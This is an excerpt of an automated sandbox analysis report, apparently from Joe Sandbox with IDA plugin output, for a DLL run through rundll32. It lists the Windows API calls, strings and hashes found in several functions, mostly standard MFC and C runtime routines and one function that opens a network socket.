                                                                                                                      • Instruction ID: f69531b56b144151f4c46f4c2f1acf85afd3bdedcb4b37807a4dae52f16cbedc
                                                                                                                      • Opcode Fuzzy Hash: 147489415d7f7f12e4b820da42085f8fd97c08a4daccd4d9168a1bbabc89fc72
                                                                                                                      • Instruction Fuzzy Hash: AD817171D002699FDB10DFA5DD44AFEBBF9FB48341F11012AE944E7290DB789A41CB60
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • RegisterClipboardFormatA.USER32(Native), ref: 1002E138
                                                                                                                      • RegisterClipboardFormatA.USER32(OwnerLink), ref: 1002E141
                                                                                                                      • RegisterClipboardFormatA.USER32(ObjectLink), ref: 1002E14B
                                                                                                                      • RegisterClipboardFormatA.USER32(Embedded Object), ref: 1002E155
                                                                                                                      • RegisterClipboardFormatA.USER32(Embed Source), ref: 1002E15F
                                                                                                                      • RegisterClipboardFormatA.USER32(Link Source), ref: 1002E169
                                                                                                                      • RegisterClipboardFormatA.USER32(Object Descriptor), ref: 1002E173
                                                                                                                      • RegisterClipboardFormatA.USER32(Link Source Descriptor), ref: 1002E17D
                                                                                                                      • RegisterClipboardFormatA.USER32(FileName), ref: 1002E187
                                                                                                                      • RegisterClipboardFormatA.USER32(FileNameW), ref: 1002E191
                                                                                                                      • RegisterClipboardFormatA.USER32(Rich Text Format), ref: 1002E19B
                                                                                                                      • RegisterClipboardFormatA.USER32(RichEdit Text and Objects), ref: 1002E1A5
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ClipboardFormatRegister
                                                                                                                      • String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
                                                                                                                      • API String ID: 1228543026-2889995556
                                                                                                                      • Opcode ID: 59400726b86d90ec70e7cae638daa4a7ba4f983a7778b7d8b23ac204cd440048
                                                                                                                      • Instruction ID: dd0e5b84f65b6698509d1545b20fc89df91f0ad9f4cec7ea2b0b947e93895074
                                                                                                                      • Opcode Fuzzy Hash: 59400726b86d90ec70e7cae638daa4a7ba4f983a7778b7d8b23ac204cd440048
                                                                                                                      • Instruction Fuzzy Hash: 11013271800784AACB30EFB69C48C8BBAE4EEC5611322493EE295C7651E774D142CF88
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,10030AF9,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 10035494
                                                                                                                      • __mtterm.LIBCMT ref: 100354A0
                                                                                                                        • Part of subcall function 10035178: __decode_pointer.LIBCMT ref: 10035189
                                                                                                                        • Part of subcall function 10035178: TlsFree.KERNEL32(0000001E,10030B95,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100351A3
                                                                                                                        • Part of subcall function 10035178: DeleteCriticalSection.KERNEL32(00000000,00000000,?,00000001,10030B95,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C), ref: 10035987
                                                                                                                        • Part of subcall function 10035178: DeleteCriticalSection.KERNEL32(0000001E,?,00000001,10030B95,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23), ref: 100359B1
                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354B6
                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsGetValue,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354C3
                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsSetValue,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354D0
                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsFree,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354DD
                                                                                                                      • TlsAlloc.KERNEL32(?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 1003552D
                                                                                                                      • TlsSetValue.KERNEL32(00000000,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 10035548
                                                                                                                      • __init_pointers.LIBCMT ref: 10035552
                                                                                                                      • __encode_pointer.LIBCMT ref: 1003555D
                                                                                                                      • __encode_pointer.LIBCMT ref: 1003556D
                                                                                                                      • __encode_pointer.LIBCMT ref: 1003557D
                                                                                                                      • __encode_pointer.LIBCMT ref: 1003558D
                                                                                                                      • __decode_pointer.LIBCMT ref: 100355AE
                                                                                                                      • __calloc_crt.LIBCMT ref: 100355C7
                                                                                                                      • __decode_pointer.LIBCMT ref: 100355E1
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 100355F7
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressProc__encode_pointer$__decode_pointer$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
                                                                                                                      • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                      • API String ID: 4287529916-3819984048
                                                                                                                      • Opcode ID: 7b999aff3b121b0dd31d802fbd5a53390c05e299083a78b6c63fb44fd02a4d79
                                                                                                                      • Instruction ID: 5f0ed48c763fc33488bdc3e5787629902cd989e4a3f8a0ff7b7d748a1094bf66
                                                                                                                      • Opcode Fuzzy Hash: 7b999aff3b121b0dd31d802fbd5a53390c05e299083a78b6c63fb44fd02a4d79
                                                                                                                      • Instruction Fuzzy Hash: 0131A0709067219EEB12DF74ADC5A593AE1FB45363F21092AE414CB1F0EB3694409FA0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 1001C91F
                                                                                                                        • Part of subcall function 10020C26: __EH_prolog3.LIBCMT ref: 10020C2D
                                                                                                                      • CallNextHookEx.USER32 ref: 1001C963
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      • GetClassLongA.USER32(?,000000E6), ref: 1001C9A7
                                                                                                                      • GlobalGetAtomNameA.KERNEL32 ref: 1001C9D1
                                                                                                                      • SetWindowLongA.USER32 ref: 1001CA26
                                                                                                                      • _memset.LIBCMT ref: 1001CA70
                                                                                                                      • GetClassLongA.USER32(?,000000E0), ref: 1001CAA0
                                                                                                                      • GetClassNameA.USER32(?,?,00000100), ref: 1001CAC1
                                                                                                                      • GetWindowLongA.USER32(?,000000FC), ref: 1001CAE5
                                                                                                                      • GetPropA.USER32(?,AfxOldWndProc423), ref: 1001CAFF
                                                                                                                      • SetPropA.USER32(?,AfxOldWndProc423,?), ref: 1001CB0A
                                                                                                                      • GetPropA.USER32(?,AfxOldWndProc423), ref: 1001CB12
                                                                                                                      • GlobalAddAtomA.KERNEL32(AfxOldWndProc423), ref: 1001CB1A
                                                                                                                      • SetWindowLongA.USER32 ref: 1001CB28
                                                                                                                      • CallNextHookEx.USER32 ref: 1001CB40
                                                                                                                      • UnhookWindowsHookEx.USER32 ref: 1001CB54
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Long$ClassHookPropWindow$AtomCallGlobalNameNext$Exception@8H_prolog3H_prolog3_ThrowUnhookWindows_memset
                                                                                                                      • String ID: #32768$AfxOldWndProc423$ime
                                                                                                                      • API String ID: 867647115-4034971020
                                                                                                                      • Opcode ID: be0f4bdd952448ef7690da40483777f37b87bc3c1912211ef9ad5859523c10f5
                                                                                                                      • Instruction ID: e0f5ce7512a5b4d1e32b812d2adba45b1a1350b75cf904612dadc9a2b629d5df
                                                                                                                      • Opcode Fuzzy Hash: be0f4bdd952448ef7690da40483777f37b87bc3c1912211ef9ad5859523c10f5
                                                                                                                      • Instruction Fuzzy Hash: A561EF7540426EAFDB11DF61CD89FAE3BB8EF09362F100154F509EA191DB34EA80CBA5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: String$Variant$ClearFree_memset$ChangeException@8H_prolog3ThrowTypelstrlen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4128688680-0
                                                                                                                      • Opcode ID: 6192f18373e1637f38ae635fdb485c2c49157f7b8aa44aff1f0335ddf822a966
                                                                                                                      • Instruction ID: 42fa242583032f4c72b1ee8c19c4a820194bcb4b4a787a5525753aa98076571e
                                                                                                                      • Opcode Fuzzy Hash: 6192f18373e1637f38ae635fdb485c2c49157f7b8aa44aff1f0335ddf822a966
                                                                                                                      • Instruction Fuzzy Hash: 5EF18A7490025ADFDF11DFA8D880AEEBBB4FF05300F90406AE951AB2A1D774AE56CF50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,754A7F34,10018CA5,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018B82
                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemMetrics,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018B9E
                                                                                                                      • GetProcAddress.KERNEL32(00000000,MonitorFromWindow,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BAF
                                                                                                                      • GetProcAddress.KERNEL32(00000000,MonitorFromRect,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BC0
                                                                                                                      • GetProcAddress.KERNEL32(00000000,MonitorFromPoint,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BD1
                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BE2
                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BF3
                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018C04
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                                      • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                                                                                                      • API String ID: 667068680-68207542
                                                                                                                      • Opcode ID: ef20b1205fbe14ac9d2a40522549883dc0a7ccf4399eb4921ca3be0b95f38340
                                                                                                                      • Instruction ID: 77f58ff47d83721d02e0aa712f7cb6554a3c60b1de10c844b6b889dbd48dd915
                                                                                                                      • Opcode Fuzzy Hash: ef20b1205fbe14ac9d2a40522549883dc0a7ccf4399eb4921ca3be0b95f38340
                                                                                                                      • Instruction Fuzzy Hash: 40213071902121AAE751DF25ADC046DBAEAF349280F61093FF10CD6560D7309AC6AFA9
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Focus$Window$MessageParentState$BeepDialogEnabledH_prolog3_catch
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 656273425-0
                                                                                                                      • Opcode ID: c00fbb9f62a63b0a8ab12a0078c89d294cc621361981fd48dcea0cc4144d3722
                                                                                                                      • Instruction ID: ae1ce06b8cbd239f24ee816c06620fe7a5750cbf7a5142a39db81a57ec361da3
                                                                                                                      • Opcode Fuzzy Hash: c00fbb9f62a63b0a8ab12a0078c89d294cc621361981fd48dcea0cc4144d3722
                                                                                                                      • Instruction Fuzzy Hash: ECF1BC35E00206ABDF11EF61E984AAE7BF5EF46790F924029E845AB161DF34ECC0DB51
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 1001DDC0: GetWindowLongA.USER32(?,000000F0), ref: 1001DDCB
                                                                                                                      • GetParent.USER32(?), ref: 1001AA75
                                                                                                                      • SendMessageA.USER32 ref: 1001AA98
                                                                                                                      • GetWindowRect.USER32 ref: 1001AAB2
                                                                                                                      • GetWindowLongA.USER32(00000000,000000F0), ref: 1001AAC8
                                                                                                                      • CopyRect.USER32(?,?), ref: 1001AB15
                                                                                                                      • CopyRect.USER32(?,?), ref: 1001AB1F
                                                                                                                      • GetWindowRect.USER32 ref: 1001AB28
                                                                                                                      • CopyRect.USER32(?,?), ref: 1001AB44
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Rect$Window$Copy$Long$MessageParentSend
                                                                                                                      • String ID: (
                                                                                                                      • API String ID: 808654186-3887548279
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 100161DE
                                                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 100161FC
                                                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 10016206
                                                                                                                      • ResumeThread.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 10016248
                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,00000000), ref: 10016253
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 1001625C
                                                                                                                      • SuspendThread.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 10016267
                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,00000000), ref: 10016277
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 10016280
                                                                                                                      • CloseHandle.KERNEL32(00000002), ref: 100162A2
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      • SetEvent.KERNEL32(00000004,?,?,?,?,?,?,?,00000000), ref: 1001628A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseEventHandle$CreateObjectSingleThreadWait$Exception@8ResumeSuspendThrow_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3191170017-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32,00000000,?,00000020,1001501F,000000FF), ref: 1001455A
                                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateActCtxA,10000000), ref: 10014578
                                                                                                                      • GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 10014585
                                                                                                                      • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 10014592
                                                                                                                      • GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 1001459F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                                      • String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                                                                                                      • API String ID: 667068680-3617302793
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 10017375
                                                                                                                      • FindResourceA.KERNEL32 ref: 100173A8
                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 100173B0
                                                                                                                      • LockResource.KERNEL32(00000008,00000024,100010EC,00000000,10046640), ref: 100173C1
                                                                                                                      • GetDesktopWindow.USER32 ref: 100173F4
                                                                                                                      • IsWindowEnabled.USER32(000000FF), ref: 10017402
                                                                                                                      • EnableWindow.USER32(000000FF,00000000), ref: 10017411
                                                                                                                        • Part of subcall function 1001DEAF: IsWindowEnabled.USER32(?), ref: 1001DEB8
                                                                                                                        • Part of subcall function 1001DECA: EnableWindow.USER32(?,10046640), ref: 1001DED7
                                                                                                                      • EnableWindow.USER32(000000FF,00000001), ref: 100174ED
                                                                                                                      • GetActiveWindow.USER32 ref: 100174F8
                                                                                                                      • SetActiveWindow.USER32(000000FF), ref: 10017506
                                                                                                                      • FreeResource.KERNEL32(00000008,?,00000024,100010EC,00000000,10046640), ref: 10017522
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchLoadLock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1509511306-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 1001C7D8
                                                                                                                      • GetPropA.USER32(?,AfxOldWndProc423), ref: 1001C7E7
                                                                                                                      • CallWindowProcA.USER32(?,?,00000110,?,00000000), ref: 1001C841
                                                                                                                        • Part of subcall function 1001B617: GetWindowRect.USER32 ref: 1001B63F
                                                                                                                        • Part of subcall function 1001B617: GetWindow.USER32(?,00000004), ref: 1001B65C
                                                                                                                      • SetWindowLongA.USER32 ref: 1001C868
                                                                                                                      • RemovePropA.USER32(?,AfxOldWndProc423), ref: 1001C870
                                                                                                                      • GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 1001C877
                                                                                                                      • GlobalDeleteAtom.KERNEL32(00000000), ref: 1001C87E
                                                                                                                        • Part of subcall function 10019DB1: GetWindowRect.USER32 ref: 10019DBD
                                                                                                                      • CallWindowProcA.USER32(?,?,?,?,00000000), ref: 1001C8D2
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prolog3_catchLongRemove
                                                                                                                      • String ID: AfxOldWndProc423
                                                                                                                      • API String ID: 2702501687-1060338832
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 1001E3AC: __EH_prolog3.LIBCMT ref: 1001E3B3
                                                                                                                        • Part of subcall function 1001E3AC: GetWindowTextA.USER32(?,?,?), ref: 1001E3C9
                                                                                                                      • inet_addr.WS2_32(?), ref: 10012ECA
                                                                                                                      • htons.WS2_32(00001C1F), ref: 10012EF0
                                                                                                                        • Part of subcall function 1001C0D4: GetWindowTextLengthA.USER32 ref: 1001C0E0
                                                                                                                        • Part of subcall function 1001C0D4: GetWindowTextA.USER32(?,00000000,00000000), ref: 1001C0F8
                                                                                                                      • WSAStartup.WS2_32(00000202,?), ref: 10012F58
                                                                                                                      • _printf.LIBCMT ref: 10012F79
                                                                                                                      • socket.WS2_32(00000002,00000001,00000006), ref: 10012F87
                                                                                                                      • WSACleanup.WS2_32 ref: 10012FB6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: TextWindow$CleanupH_prolog3LengthStartup_printfhtonsinet_addrsocket
                                                                                                                      • String ID: Please enter your name$WSAStartup function failed with error: %d$error
                                                                                                                      • API String ID: 4222005279-2156106531
